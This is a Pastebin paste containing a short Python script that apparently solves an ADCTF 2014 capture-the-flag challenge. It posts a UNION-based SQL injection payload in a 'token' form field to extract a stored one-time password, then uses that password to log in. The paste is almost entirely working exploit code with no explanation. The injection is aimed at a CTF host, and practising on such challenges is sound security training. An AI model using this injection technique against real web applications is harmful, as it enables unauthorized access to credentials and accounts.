Guest User

Untitled

a guest
Dec 26th, 2014
263
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. import requests,re
  2. #razor4x - tasteless
  3. r=requests.get("http://otp.adctf2014.katsudon.org/")
  4. reg=re.search('name="token" value="(.+?)"',r.text)
  5. token=reg.group(1)
  6. r=requests.post("http://otp.adctf2014.katsudon.org/",data={'token':"' and 1=0 union select pwd from (select 1 token,2 pwd,3 expire from otp where 1=0 union select * from otp) where token='"+token+"'-- -",'pass':''})
  7. reg=re.search('otp expired at (.+?)</p>',r.text)
  8. pw=reg.group(1)
  9. r=requests.post("http://otp.adctf2014.katsudon.org/",data={'token':token,'pass':pw})
  10. print r.text
RAW Paste Data